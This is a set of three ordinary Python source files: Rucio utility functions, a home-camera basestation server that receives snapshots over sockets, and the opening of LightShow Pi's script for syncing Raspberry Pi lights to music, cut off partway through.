raise MetalinkJsonParsingError(string, xml_err, json_err)
def parse_replicas_metalink(root):
"""
Transforms the metalink tree into a list of dictionaries where
each dictionary describes a file with its replicas.
Will be called by parse_replicas_from_file and parse_replicas_from_string.
:param root: root node of the metalink tree
:returns: a list with a dictionary for each file
"""
files = []
# metalink namespace
ns = '{urn:ietf:params:xml:ns:metalink}'
str_to_bool = {'true': True, 'True': True, 'false': False, 'False': False}
# loop over all <file> tags of the metalink string
for file_tag_obj in root.findall(ns + 'file'):
# search for identity-tag
identity_tag_obj = file_tag_obj.find(ns + 'identity')
if not ElementTree.iselement(identity_tag_obj):
raise InputValidationError('Failed to locate identity-tag inside %s' % ElementTree.tostring(file_tag_obj))
cur_file = {'did': identity_tag_obj.text,
'adler32': None,
'md5': None,
'sources': []}
parent_dids = set()
parent_dids_tag_obj = file_tag_obj.find(ns + 'parents')
if ElementTree.iselement(parent_dids_tag_obj):
for did_tag_obj in parent_dids_tag_obj.findall(ns + 'did'):
parent_dids.add(did_tag_obj.text)
cur_file['parent_dids'] = parent_dids
size_tag_obj = file_tag_obj.find(ns + 'size')
cur_file['bytes'] = int(size_tag_obj.text) if ElementTree.iselement(size_tag_obj) else None
for hash_tag_obj in file_tag_obj.findall(ns + 'hash'):
hash_type = hash_tag_obj.get('type')
if hash_type:
cur_file[hash_type] = hash_tag_obj.text
for url_tag_obj in file_tag_obj.findall(ns + 'url'):
key_rename_map = {'location': 'rse'}
src = {}
for k, v in url_tag_obj.items():
k = key_rename_map.get(k, k)
src[k] = str_to_bool.get(v, v)
src['pfn'] = url_tag_obj.text
cur_file['sources'].append(src)
files.append(cur_file)
return files
def get_thread_with_periodic_running_function(interval, action, graceful_stop):
"""
Get a thread where a function runs periodically.
:param interval: Interval in seconds when the action fucntion should run.
:param action: Function, that should run periodically.
:param graceful_stop: Threading event used to check for graceful stop.
"""
def start():
while not graceful_stop.is_set():
starttime = time.time()
action()
time.sleep(interval - ((time.time() - starttime)))
t = threading.Thread(target=start)
return t
def run_cmd_process(cmd, timeout=3600):
"""
shell command parser with timeout
:param cmd: shell command as a string
:param timeout: in seconds
:return: stdout xor stderr, and errorcode
"""
time_start = datetime.datetime.now().second
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
running_time = 0
while process.poll() is None and running_time < timeout:
time_now = datetime.datetime.now().second
running_time = int(time_now - time_start)
time.sleep(3)
if process.poll() is None:
process.terminate()
time.sleep(3)
if process.poll() is None:
process.kill()
stdout, stderr = process.communicate()
if isinstance(stdout, binary_type):
stdout = ensure_text(stdout, errors='replace')
stderr = ensure_text(stderr, errors='replace')
if not stderr:
stderr = ''
if not stdout:
stdout = ''
if stderr and stderr != '':
stdout += " Error: " + stderr
if process:
returncode = process.returncode
else:
returncode = 1
if returncode != 1 and 'Command time-out' in stdout:
returncode = 1
if returncode is None:
returncode = 0
return returncode, stdout
def api_update_return_dict(dictionary, session=None):
"""
Ensure that rse is in a dictionary returned from core
:param dictionary: The dictionary to edit
:param session: The DB session to use
:returns dictionary: The edited dictionary
"""
if not isinstance(dictionary, dict):
return dictionary
copied = False # Avoid side effects from pass by object
for rse_str in ['rse', 'src_rse', 'source_rse', 'dest_rse', 'destination_rse']:
rse_id_str = '%s_id' % rse_str
if rse_id_str in dictionary.keys() and dictionary[rse_id_str] is not None:
if rse_str not in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
import rucio.core.rse
dictionary[rse_str] = rucio.core.rse.get_rse_name(rse_id=dictionary[rse_id_str], session=session)
if 'account' in dictionary.keys() and dictionary['account'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['account'] = dictionary['account'].external
if 'scope' in dictionary.keys() and dictionary['scope'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['scope'] = dictionary['scope'].external
return dictionary
def get_parsed_throttler_mode(throttler_mode):
""" Parse the conveyor-throttler mode string. """
direction = None
all_activities = None
if throttler_mode == 'DEST_PER_ACT':
direction = 'destination'
all_activities = False
elif throttler_mode == 'DEST_PER_ALL_ACT':
direction = 'destination'
all_activities = True
elif throttler_mode == 'SRC_PER_ACT':
direction = 'source'
all_activities = False
elif throttler_mode == 'SRC_PER_ALL_ACT':
direction = 'source'
all_activities = True
return (direction, all_activities)
def setup_logger(module_name=None, logger_name=None, logger_level=None, verbose=False):
'''
Factory method to set logger with handlers.
:param module_name: __name__ of the module that is calling this method
:param logger_name: name of the logger, typically name of the module.
:param logger_level: if not given, fetched from config.
:param verbose: verbose option set in bin/rucio
'''
# helper method for cfg check
def _force_cfg_log_level(cfg_option):
cfg_forced_modules = config_get('logging', cfg_option, raise_exception=False, default=None, clean_cached=True,
check_config_table=False)
if cfg_forced_modules:
if re.match(str(cfg_forced_modules), module_name):
return True
return False
# creating log
if not logger_name:
if not module_name:
logger_name = 'usr'
else:
logger_name = module_name.split('.')[-1]
logger = logging.getLogger(logger_name)
# extracting the log level
if not logger_level:
logger_level = logging.INFO
if verbose:
logger_level = logging.DEBUG
# overriding by the config
cfg_levels = (logging.DEBUG, logging.INFO, logging.WARNING, logging.ERROR)
for level in cfg_levels:
cfg_opt = 'forceloglevel' + logging.getLevelName(level)
if _force_cfg_log_level(cfg_opt):
logger_level = level
# setting the log level
logger.setLevel(logger_level)
# preferred logger handling
def add_handler(logger):
hdlr = logging.StreamHandler()
def emit_decorator(fnc):
def func(*args):
if 'RUCIO_LOGGING_FORMAT' not in os.environ:
levelno = args[0].levelno
format_str = '%(asctime)s\t%(levelname)s\t%(message)s\033[0m'
if levelno >= logging.CRITICAL:
color = '\033[31;1m'
elif levelno >= logging.ERROR:
color = '\033[31;1m'
elif levelno >= logging.WARNING:
color = '\033[33;1m'
elif levelno >= logging.INFO:
color = '\033[32;1m'
elif levelno >= logging.DEBUG:
color = '\033[36;1m'
format_str = '%(asctime)s\t%(levelname)s\t%(filename)s\t%(message)s\033[0m'
else:
color = '\033[0m'
formatter = logging.Formatter('{0}{1}'.format(color, format_str))
else:
formatter = logging.Formatter(os.environ['RUCIO_LOGGING_FORMAT'])
hdlr.setFormatter(formatter)
return fnc(*args)
return func
hdlr.emit = emit_decorator(hdlr.emit)
logger.addHandler(hdlr)
# setting handler and formatter
if not logger.handlers:
add_handler(logger)
return logger
def daemon_sleep(start_time, sleep_time, graceful_stop, logger=logging.log):
"""Sleeps a daemon the time provided by sleep_time"""
end_time = time.time()
time_diff = end_time - start_time
if time_diff < sleep_time:
logger(logging.INFO, 'Sleeping for a while : %s seconds', (sleep_time - time_diff))
graceful_stop.wait(sleep_time - time_diff)
def is_client():
""""
Checks if the function is called from a client or from a server/daemon
:returns client_mode: True if is called from a client, False if it is called from a server/daemon
"""
if 'RUCIO_CLIENT_MODE' not in os.environ:
try:
if config_has_section('database'):
client_mode = False
elif config_has_section('client'):
client_mode = True
else:
client_mode = False
except RuntimeError:
# If no configuration file is found the default value should be True
client_mode = True
else:
if os.environ['RUCIO_CLIENT_MODE']:
client_mode = True
else:
client_mode = False
return client_mode
class retry:
"""Retry callable object with configuragle number of attempts"""
def __init__(self, func, *args, **kwargs):
'''
:param func: a method that should be executed with retries
:param args parametres of the func
:param kwargs: key word arguments of the func
'''
self.func, self.args, self.kwargs = func, args, kwargs
def __call__(self, mtries=3, logger=logging.log):
'''
:param mtries: maximum number of attempts to execute the function
:param logger: preferred logger
'''
attempt = mtries
while attempt > 1:
try:
if logger:
logger(logging.DEBUG, '{}: Attempt {}'.format(self.func.__name__, mtries - attempt + 1))
return self.func(*self.args, **self.kwargs)
except Exception as e:
if logger:
logger(logging.DEBUG, '{}: Attempt failed {}'.format(self.func.__name__, mtries - attempt + 1))
logger(logging.DEBUG, str(e))
attempt -= 1
return self.func(*self.args, **self.kwargs)
class StoreAndDeprecateWarningAction(argparse.Action):
'''
StoreAndDeprecateWarningAction is a descendant of :class:`argparse.Action`
and represents a store action with a deprecated argument name.
'''
def __init__(self,
option_strings,
new_option_string,
dest,
**kwargs):
"""
:param option_strings: all possible argument name strings
:param new_option_string: the new option string which replaces the old
:param dest: name of variable to store the value in
:param kwargs: everything else
"""
super(StoreAndDeprecateWarningAction, self).__init__(
option_strings=option_strings,
dest=dest,
**kwargs)
assert new_option_string in option_strings
self.new_option_string = new_option_string
def __call__(self, parser, namespace, values, option_string=None):
if option_string and option_string != self.new_option_string:
# The logger gets typically initialized after the argument parser
# to set the verbosity of the logger. Thus using simple print to console.
print("Warning: The commandline argument {} is deprecated! Please use {} in the future.".format(option_string, self.new_option_string))
setattr(namespace, self.dest, values)
class StoreTrueAndDeprecateWarningAction(argparse._StoreConstAction):
'''
StoreAndDeprecateWarningAction is a descendant of :class:`argparse.Action`
and represents a store action with a deprecated argument name.
'''
def __init__(self,
option_strings,
new_option_string,
dest,
default=False,
required=False,
help=None):
"""
:param option_strings: all possible argument name strings
:param new_option_string: the new option string which replaces the old
:param dest: name of variable to store the value in
:param kwargs: everything else
"""
super(StoreTrueAndDeprecateWarningAction, self).__init__(
option_strings=option_strings,
dest=dest,
const=True,
default=default,
required=required,
help=help)
assert new_option_string in option_strings
self.new_option_string = new_option_string
def __call__(self, parser, namespace, values, option_string=None):
super(StoreTrueAndDeprecateWarningAction, self).__call__(parser, namespace, values, option_string=option_string)
if option_string and option_string != self.new_option_string:
# The logger gets typically initialized after the argument parser
# to set the verbosity of the logger. Thus using simple print to console.
print("Warning: The commandline argument {} is deprecated! Please use {} in the future.".format(option_string, self.new_option_string))
class PriorityQueue:
"""
Heap-based [1] priority queue which supports priority update operations
It is used as a dictionary: pq['element'] = priority
The element with the highest priority can be accessed with pq.top() or pq.pop(),
depending on the desire to keep it in the heap or not.
[1] https://en.wikipedia.org/wiki/Heap_(data_structure)
"""
class ContainerSlot:
def __init__(self, position, priority):
self.pos = position
self.prio = priority
def __init__(self):
self.heap = []
self.container = {}
self.empty_slots = []
def __len__(self):
return len(self.heap)
def __getitem__(self, item):
return self.container[item].prio
def __setitem__(self, key, value):
if key in self.container:
existing_prio = self.container[key].prio
self.container[key].prio = value
if value < existing_prio:
self._priority_decreased(key)
elif existing_prio < value:
self._priority_increased(key)
else:
self.heap.append(key)
self.container[key] = self.ContainerSlot(position=len(self.heap) - 1, priority=value)
self._priority_decreased(key)
def __contains__(self, item):
return item in self.container
def top(self):
return self.heap[0]
def pop(self):
item = self.heap[0]
self.container.pop(item)
tmp_item = self.heap.pop()
if self.heap:
self.heap[0] = tmp_item
self.container[tmp_item].pos = 0
self._priority_increased(tmp_item)
return item
def _priority_decreased(self, item):
heap_changed = False
pos = self.container[item].pos
pos_parent = (pos - 1) // 2
while pos > 0 and self.container[self.heap[pos]].prio < self.container[self.heap[pos_parent]].prio:
tmp_item, parent = self.heap[pos], self.heap[pos_parent] = self.heap[pos_parent], self.heap[pos]
self.container[tmp_item].pos, self.container[parent].pos = self.container[parent].pos, self.container[tmp_item].pos
pos = pos_parent
pos_parent = (pos - 1) // 2
heap_changed = True
return heap_changed
def _priority_increased(self, item):
heap_changed = False
heap_len = len(self.heap)
pos = self.container[item].pos
pos_child1 = 2 * pos + 1
pos_child2 = 2 * pos + 2
heap_restored = False
while not heap_restored:
# find minimum between item, child1, and child2
if pos_child1 < heap_len and self.container[self.heap[pos_child1]].prio < self.container[self.heap[pos]].prio:
pos_min = pos_child1
else:
pos_min = pos
if pos_child2 < heap_len and self.container[self.heap[pos_child2]].prio < self.container[self.heap[pos_min]].prio:
pos_min = pos_child2
if pos_min != pos:
_, tmp_item = self.heap[pos_min], self.heap[pos] = self.heap[pos], self.heap[pos_min]
self.container[tmp_item].pos = pos
pos = pos_min
pos_child1 = 2 * pos + 1
pos_child2 = 2 * pos + 2
heap_changed = True
else:
heap_restored = True
self.container[self.heap[pos]].pos = pos
return heap_changed
def register_policy_package_algorithms(algorithm_type, dictionary):
'''
Loads all the algorithms of a given type from the policy package(s) and registers them
:param algorithm_type: the type of algorithm to register (e.g. 'surl', 'lfn2pfn')
:param dictionary: the dictionary to register them in
:param vo: the name of the relevant VO (None for single VO)
'''
def try_importing_policy(algorithm_type, dictionary, vo=None):
import importlib
try:
env_name = 'RUCIO_POLICY_PACKAGE' + ('' if not vo else '_' + vo.upper())
if env_name in os.environ:
package = os.environ[env_name]
else:
package = config.config_get('policy', 'package' + ('' if not vo else '-' + vo))
module = importlib.import_module(package)
if hasattr(module, 'get_algorithms'):
all_algorithms = module.get_algorithms()
if algorithm_type in all_algorithms:
algorithms = all_algorithms[algorithm_type]
if not vo:
dictionary.update(algorithms)
else:
# check that the names are correctly prefixed
for k in algorithms.keys():
if k.lower().startswith(vo.lower()):
dictionary[k] = algorithms[k]
else:
raise InvalidAlgorithmName(k, vo)
except (NoOptionError, NoSectionError, ImportError):
pass
from rucio.common import config
try:
multivo = config.config_get_bool('common', 'multi_vo')
except (NoOptionError, NoSectionError):
multivo = False
if not multivo:
# single policy package
try_importing_policy(algorithm_type, dictionary)
else:
# determine whether on client or server
client = False
if 'RUCIO_CLIENT_MODE' not in os.environ:
if not config.config_has_section('database') and config.config_has_section('client'):
client = True
else:
if os.environ['RUCIO_CLIENT_MODE']:
client = True
# on client, only register algorithms for selected VO
if client:
if 'RUCIO_VO' in os.environ:
vo = os.environ['RUCIO_VO']
else:
try:
vo = config.config_get('client', 'vo')
except (NoOptionError, NoSectionError):
vo = 'def'
try_importing_policy(algorithm_type, dictionary, vo)
# on server, list all VOs and register their algorithms
else:
from rucio.core.vo import list_vos
# policy package per VO
vos = list_vos()
for vo in vos:
try_importing_policy(algorithm_type, dictionary, vo['vo'])
|
server.py
|
'''
Basestation recieves photos captured by propertycam camera units.
'''
import socket
import datetime
import socketserver
import http.server
import threading
from basestation.datastore import DataStore
from basestation.snap import Snap
from basestation.snappipeline import SnapPipeline
# Serve snap images via an HTTP server
print('Propertycam basestation http file server starting')
server_address = ('', 8000)
handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(server_address, handler)
httpd_thread = threading.Thread(target=httpd.serve_forever)
httpd_thread.setDaemon(True)
httpd_thread.start()
print('httpd thread started')
# Create TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind the socket to a port
#server_address = ('localhost', 50000)
server_address = ('', 50000)
sock.bind(server_address)
sock.listen()
print('Propertycam basestation listening on %s port %s' % server_address)
# TODO: Wait for cameras to connect
# Add connected cameras to datastore
ds = DataStore()
camera_mac_address = '001122334455'
ds.add_camera(camera_mac_address)
# Create snap processing pipeline
snap_pipeline = SnapPipeline(ds)
# Continuously accept and handle connections
while True:
# Wait for connection
connection, client_addr = sock.accept()
print('Connection from ', client_addr)
# TODO: Get camera MAC address and snap time from camera
camera_mac_address = '001122334455'
snap_time = datetime.datetime.now()
# Receive snap parts and store in buffer
snap_buffer = bytes()
part_size = 1024
part_buffer = connection.recv(part_size)
partnum = 1
while(part_buffer):
#print('Recieved part ', partnum)
snap_buffer += part_buffer
part_buffer = connection.recv(part_size)
partnum = partnum + 1
# Finished receiving
print("Done receiving")
connection.close()
# Execute snap pipeline
snap = Snap(camera_mac_address, snap_time, snap_buffer)
snap_pipeline.execute(snap)
# Wait for http server thread to finish
httpd_thread.join()
|
synchronized_lights.py
|
#!/usr/bin/env python
#
# Licensed under the BSD license. See full license in LICENSE file.
# http://www.lightshowpi.org/
#
# Author: Todd Giles (todd@lightshowpi.org)
# Author: Chris Usey (chris.usey@gmail.com)
# Author: Ryan Jennings
# Author: Paul Dunn (dunnsept@gmail.com)
# Author: Tom Enos (tomslick.ca@gmail.com)
"""Play any audio file and synchronize lights to the music
When executed, this script will play an audio file, as well as turn on
and off N channels of lights to the music (by default the first 8 GPIO
channels on the Raspberry Pi), based upon music it is playing. Many
types of audio files are supported (see decoder.py below), but it has
only been tested with wav and mp3 at the time of this writing.
The timing of the lights turning on and off is based upon the frequency
response of the music being played. A short segment of the music is
analyzed via FFT to get the frequency response across each defined
channel in the audio range. Each light channel is then faded in and
out based upon the amplitude of the frequency response in the
corresponding audio channel. Fading is accomplished with a software
PWM output. Each channel can also be configured to simply turn on and
off as the frequency response in the corresponding channel crosses a
threshold.
FFT calculation can be CPU intensive and in some cases can adversely
affect playback of songs (especially if attempting to decode the song
as well, as is the case for an mp3). For this reason, the FFT
calculations are cached after the first time a new song is played.
The values are cached in a gzipped text file in the same location as the
song itself. Subsequent requests to play the same song will use the
cached information and not recompute the FFT, thus reducing CPU
utilization dramatically and allowing for clear music playback of all
audio file types.
Recent optimizations have improved this dramatically and most users are
no longer reporting adverse playback of songs even on the first
playback.
Sample usage:
To play an entire list -
sudo python synchronized_lights.py --playlist=/home/pi/music/.playlist
To play a specific song -
sudo python synchronized_lights.py --file=/home/pi/music/jingle_bells.mp3
Third party dependencies:
alsaaudio: for audio input/output
http://pyalsaaudio.sourceforge.net/
decoder.py: decoding mp3, ogg, wma, ...
https://pypi.python.org/pypi/decoder.py/1.5XB
numpy: for FFT calculation
http://www.numpy.org/
"""
import configparser
import argparse
import atexit
import audioop
from collections import deque
import errno
import json
import logging as log
import os
import random
import subprocess
import signal
import stat
import sys
import time
import wave
import curses
import bright_curses
import mutagen
from queue import Queue, Empty
from threading import Thread
import alsaaudio as aa
import decoder
import numpy as np
from numpy import where, clip, round, nan_to_num
import Platform
import fft
from prepostshow import PrePostShow
import RunningStats
# Make sure SYNCHRONIZED_LIGHTS_HOME environment variable is set
HOME_DIR = os.getenv("SYNCHRONIZED_LIGHTS_HOME")
if not HOME_DIR:
print("Need to setup SYNCHRONIZED_LIGHTS_HOME environment variable, see readme")
sys.exit()
LOG_DIR = HOME_DIR + '/logs'
# logging levels
levels = {'DEBUG': log.DEBUG,
'INFO': log.INFO,
'WARNING': log.WARNING,
'ERROR': log.ERROR,
'CRITICAL': log.CRITICAL}
# Arguments
parser = argparse.ArgumentParser()
parser.add_argument('--log', default=None,
help='Set the logging level. levels:INFO, DEBUG, WARNING, ERROR, CRITICAL')
parser.add_argument('--config', default=None, help='Config File Override')
file_group = parser.add_mutually_exclusive_group()
file_group.add_argument('--playlist', default=None,
help='Playlist to choose song from.')
file_group.add_argument('--file', help='path to the song to play (required if no '
'playlist is designated)')
cache_group = parser.add_mutually_exclusive_group()
cache_group.add_argument('--readcache', type=bool, default=True,
help='read light timing from cache if available. Default: true')
cache_group.add_argument('--createcache', action="store_true",
help='create light timing cache without audio playback or lightshow.')
if parser.parse_args().createcache:
parser.set_defaults(readcache=False)
# Setup log file
log.basicConfig(filename=LOG_DIR + '/music_and_lights.play.dbg',
format='[%(asctime)s] %(levelname)s {%(pathname)s:%(lineno)d} - %(message)s',
level=log.INFO)
args = parser.parse_args()
# import hardware_controller
import hardware_controller
hc = hardware_controller.Hardware(param_config=args.config)
# get copy of configuration manager
cm = hc.cm
if not args.playlist:
args.playlist=cm.lightshow.playlist_path
class Lightshow(object):
def __init__(self):
self.stream = None
self.fm_process = None
self.streaming = None
self.sample_rate = None
self.num_channels = None
self.music_file = None
self.fft_calc = None
self.light_delay = None
self.cache_found = None
self.cache_matrix = None
self.cache_filename = None
self.config_filename = None
self.song_filename = None
self.terminal = None
self.output = lambda raw_data: None
self.mean = np.array([12.0 for _ in range(cm.hardware.gpio_len)], dtype='float32')
self.std = np.array([1.5 for _ in range(cm.hardware.gpio_len)], dtype='float32')
self.attenuate_pct = cm.lightshow.attenuate_pct
self.sd_low = cm.lightshow.SD_low
self.sd_high = cm.lightshow.SD_high
self.decay_factor = cm.lightshow.decay_factor
self.decay = np.zeros(cm.hardware.gpio_len, dtype='float32')
self.physical_gpio_len = cm.hardware.physical_gpio_len
self.network = hc.network
self.server = self.network.networking == "server" or self.network.networking == "serverjson"
self.client = self.network.networking == "client"
if cm.lightshow.use_fifo:
if os.path.exists(cm.lightshow.fifo):
os.remove(cm.lightshow.fifo)
os.mkfifo(cm.lightshow.fifo, 0o777)
self.chunk_size = cm.audio_processing.chunk_size # Use a multiple of 8
atexit.register(self.exit_function)
# Remove traceback on Ctrl-C
signal.signal(signal.SIGINT, lambda x, y: sys.exit(0))
signal.signal(signal.SIGTERM, lambda x, y: sys.exit(0))
if cm.terminal.enabled:
self.terminal = bright_curses.BrightCurses(cm.terminal)
curses.wrapper(self.launch_curses)
def exit_function(self):
"""atexit function"""
if self.server:
self.network.set_playing()
self.network.broadcast([0. for _ in range(cm.hardware.gpio_len)])
time.sleep(1)
self.network.unset_playing()
hc.clean_up()
if cm.fm.enabled:
self.fm_process.kill()
if self.network.network_stream:
self.network.close_connection()
if cm.lightshow.mode == 'stream-in':
try:
self.streaming.stdin.write(b"q")
except IOError:
pass
os.kill(self.streaming.pid, signal.SIGINT)
if cm.lightshow.use_fifo:
os.unlink(cm.lightshow.fifo)
os.system("/bin/echo \"\" >" + cm.home_dir + "/logs/now_playing.txt")
def update_lights(self, matrix):
"""Update the state of all the lights
Update the state of all the lights based upon the current
frequency response matrix
:param matrix: row of data from cache matrix
:type matrix: list
"""
brightness = matrix - self.mean + (self.std * self.sd_low)
brightness = (brightness / (self.std * (self.sd_low + self.sd_high))) \
* (1.0 - (self.attenuate_pct / 100.0))
# insure that the brightness levels are in the correct range
brightness = clip(brightness, 0.0, 1.0)
# brightness = round(brightness, decimals=3)
brightness = nan_to_num(brightness)
# calculate light decay rate if used
if self.decay_factor > 0:
self.decay = where(self.decay <= brightness,
brightness,
self.decay)
brightness = where(self.decay <= brightness,
brightness,
self.decay)
self.decay = where(self.decay - self.decay_factor > 0,
self.decay - self.decay_factor,
0)
# broadcast to clients if in server mode
if self.server:
self.network.broadcast(brightness)
if self.terminal:
self.terminal.curses_render(brightness)
return
# in the instance a single channel is defined convert scalar back into array
if not hasattr(brightness, "__len__"):
brightness = np.array([brightness])
for pin in range(len(brightness[:self.physical_gpio_len])):
hc.set_light(pin, True, brightness[pin])
if hc.led:
if cm.led.led_channel_configuration == "EXTEND":
leds = brightness[self.physical_gpio_len:]
else:
leds = brightness[:cm.hardware.gpio_len]
for led_instance in hc.led:
led_instance.write_all(leds)
def set_fm(self):
pi_version = Platform.pi_version()
srate = str(int(self.sample_rate / (1 if self.num_channels > 1 else 2)))
if os.path.exists(cm.fm.fmfifo):
os.remove(cm.fm.fmfifo)
os.mkfifo(cm.fm.fmfifo, 0o777)
fm_command = ["sudo",
cm.home_dir + "/bin/pifm",
"-",
cm.fm.frequency,
srate,
"stereo" if self.num_channels > 1 else "mono"]
if pi_version == 2 or pi_version == 3:
fm_command = ["sudo",
cm.home_dir + "/bin/pi_fm_rds",
"-audio", "-", "-freq",
cm.fm.frequency,
"-srate",
srate,
"-ps",
cm.fm.program_service_name,
"-rt",
cm.fm.radio_text,
"-ctl",
cm.fm.fmfifo,
"-nochan",
"2" if self.num_channels > 1 else "1"]
if pi_version == 4:
fm_command = ["sudo",
cm.home_dir + "/bin/pi_fm_adv",
"--audio", "-", "--freq",
cm.fm.frequency,
"--srate",
srate,
"--ps",
cm.fm.program_service_name,
"--rt",
cm.fm.radio_text,
"--ctl",
cm.fm.fmfifo,
"--nochan",
"2" if self.num_channels > 1 else "1"]
log.info("Sending output as fm transmission")
with open(os.devnull, "w") as dev_null:
self.fm_process = subprocess.Popen(fm_command,
stdin=subprocess.PIPE,
stdout=dev_null)
self.output = lambda raw_data: self.fm_process.stdin.write(raw_data)
fmoutthrps = Thread(target=self.update_fmoutps, args=(cm, cm.fm.program_service_name))
fmoutthrps.daemon = True
fmoutthrps.start()
fmoutthrrt = Thread(target=self.update_fmoutrt, args=(cm, cm.fm.radio_text))
fmoutthrrt.daemon = True
fmoutthrrt.start()
def update_fmoutps(self, cm, ps):
ps_chunk_array = [ ps[i:i+8] for i in range(0, len(ps), 8) ]
while True:
for chunk in ps_chunk_array:
os.system("echo PS " + chunk + " > " + cm.fm.fmfifo)
time.sleep(float(cm.fm.ps_increment_delay))
def update_fmoutrt(self, cm, rt):
nptxt = cm.home_dir + "/logs/now_playing.txt"
while True:
with open(nptxt, 'r') as file:
npdata = file.read()
npdata = npdata.replace("'","")
npdata = npdata.replace('"',"")
os.system("echo RT '" + npdata + "' > " + cm.fm.fmfifo)
time.sleep(float(cm.fm.ps_increment_delay))
def set_audio_device(self):
if cm.fm.enabled:
self.set_fm()
elif cm.lightshow.audio_out_card is not '':
if cm.lightshow.mode == 'stream-in':
self.num_channels = 2
output_device = aa.PCM(aa.PCM_PLAYBACK, aa.PCM_NORMAL, cm.lightshow.audio_out_card)
output_device.setchannels(self.num_channels)
output_device.setrate(self.sample_rate)
output_device.setformat(aa.PCM_FORMAT_S16_LE)
output_device.setperiodsize(self.chunk_size)
self.output = lambda raw_data: output_device.write(raw_data)
def set_audio_source(self):
stream_reader = None
outq = None
if cm.lightshow.mode == 'audio-in':
# Open the input stream from default input device
self.streaming = aa.PCM(aa.PCM_CAPTURE, aa.PCM_NORMAL, cm.lightshow.audio_in_card)
self.streaming.setchannels(self.num_channels)
self.streaming.setformat(aa.PCM_FORMAT_S16_LE) # Expose in config if needed
self.streaming.setrate(self.sample_rate)
self.streaming.setperiodsize(self.chunk_size)
stream_reader = lambda: self.streaming.read()[-1]
elif cm.lightshow.mode == 'stream-in':
outq = Queue()
if cm.lightshow.use_fifo:
self.streaming = subprocess.Popen(cm.lightshow.stream_command_string,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
preexec_fn=os.setsid)
io = os.open(cm.lightshow.fifo, os.O_RDONLY | os.O_NONBLOCK)
stream_reader = lambda: os.read(io, self.chunk_size)
outthr = Thread(target=self.enqueue_output, args=(self.streaming.stdout, outq))
else:
# Open the input stream from command string
self.streaming = subprocess.Popen(cm.lightshow.stream_command_string,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stream_reader = lambda: self.streaming.stdout.read(self.chunk_size)
outthr = Thread(target=self.enqueue_output, args=(self.streaming.stderr, outq))
outthr.daemon = True
outthr.start()
return stream_reader,outq
def audio_in(self):
"""Control the lightshow from audio coming in from a real time audio"""
self.sample_rate = cm.lightshow.input_sample_rate
self.num_channels = cm.lightshow.input_channels
stream_reader,outq = self.set_audio_source()
log.debug("Running in %s mode - will run until Ctrl+C is pressed" % cm.lightshow.mode)
print("Running in %s mode, use Ctrl+C to stop" % cm.lightshow.mode)
# setup light_delay.
chunks_per_sec = ((16 * self.num_channels * self.sample_rate) / 8) / self.chunk_size
light_delay = int(cm.lightshow.light_delay * chunks_per_sec)
matrix_buffer = deque([], 1000)
self.set_audio_device()
# Start with these as our initial guesses - will calculate a rolling mean / std
# as we get input data.
# preload running_stats to avoid errors, and give us a show that looks
# good right from the start
count = 2
running_stats = RunningStats.Stats(cm.hardware.gpio_len)
running_stats.preload(self.mean, self.std, count)
hc.initialize()
fft_calc = fft.FFT(self.chunk_size,
self.sample_rate,
cm.hardware.gpio_len,
cm.audio_processing.min_frequency,
cm.audio_processing.max_frequency,
cm.audio_processing.custom_channel_mapping,
cm.audio_processing.custom_channel_frequencies,
1,
cm.audio_processing.use_gpu)
if self.server:
self.network.set_playing()
songcount = 0
# Listen on the audio input device until CTRL-C is pressed
while True:
if cm.lightshow.mode == 'stream-in':
try:
streamout = outq.get_nowait().strip(b'\n\r').decode("utf-8")
except Empty:
pass
else:
print(streamout)
if cm.lightshow.stream_song_delim in streamout:
songcount+=1
streamout = streamout.replace('\033[2K','')
streamout = streamout.replace(cm.lightshow.stream_song_delim,'')
streamout = streamout.replace('"','')
os.system("/bin/echo " + "Now Playing \"" + streamout + "\"" + " >" + cm.home_dir + "/logs/now_playing.txt")
if cm.lightshow.songname_command:
os.system(cm.lightshow.songname_command + ' "Now Playing ' + streamout + '"')
if cm.lightshow.stream_song_exit_count > 0 and songcount > cm.lightshow.stream_song_exit_count:
break
try:
data = stream_reader()
except OSError as err:
if err.errno == errno.EAGAIN or err.errno == errno.EWOULDBLOCK:
continue
# try:
# self.output(data)
# except aa.ALSAAudioError:
# continue
if len(data):
# if the maximum of the absolute value of all samples in
# data is below a threshold we will disregard it
audio_max = audioop.max(data, 2)
if audio_max < 250:
# we will fill the matrix with zeros and turn the lights off
matrix = np.zeros(cm.hardware.gpio_len, dtype="float32")
log.debug("below threshold: '" + str(audio_max) + "', turning the lights off")
else:
matrix = fft_calc.calculate_levels(data)
running_stats.push(matrix)
self.mean = running_stats.mean()
self.std = running_stats.std()
matrix_buffer.appendleft(matrix)
if len(matrix_buffer) > light_delay:
matrix = matrix_buffer[light_delay]
self.update_lights(matrix)
def load_custom_config(self):
"""
Load custom configuration settings for file config_filename
"""
"""
example usage
your song
carol-of-the-bells.mp3
First run your playlist (or single files) to create your sync files. This will
create a file in the same directory as your music file.
.carol-of-the-bells.mp3.cfg
DO NOT EDIT THE existing section [fft], it will cause your sync files to be ignored.
If you want to use an override you need to add the appropriate section
The add the options you wish to use, but do not add an option you do not
want to use, as this will set that option to None and could crash your lightshow.
Look at defaults.cfg for exact usages of each option
[custom_lightshow]
always_on_channels =
always_off_channels =
invert_channels =
preshow_configuration =
preshow_script =
postshow_configuration =
postshow_script =
attenuate_pct =
[custom_audio_processing]
min_frequency =
max_frequency =
custom_channel_mapping =
custom_channel_frequencies =
Note: DO NOT EDIT THE existing section [fft]
Note: If you use any of the options in "custom_audio_processing" your sync files will be
automatically regenerated after every change. This is normal as your sync file needs
to match these new settings. After they have been regenerated you will see that they
now match the settings [fft], and you will not have to regenerate then again. Unless
you make more changes again.
Note: Changes made in "custom_lightshow" do not affect the sync files, so you will not need
to regenerate them after making changes.
"""
if os.path.isfile(self.config_filename):
config = configparser.RawConfigParser(allow_no_value=True)
with open(self.config_filename) as f:
config.read_file(f)
if config.has_section('custom_lightshow'):
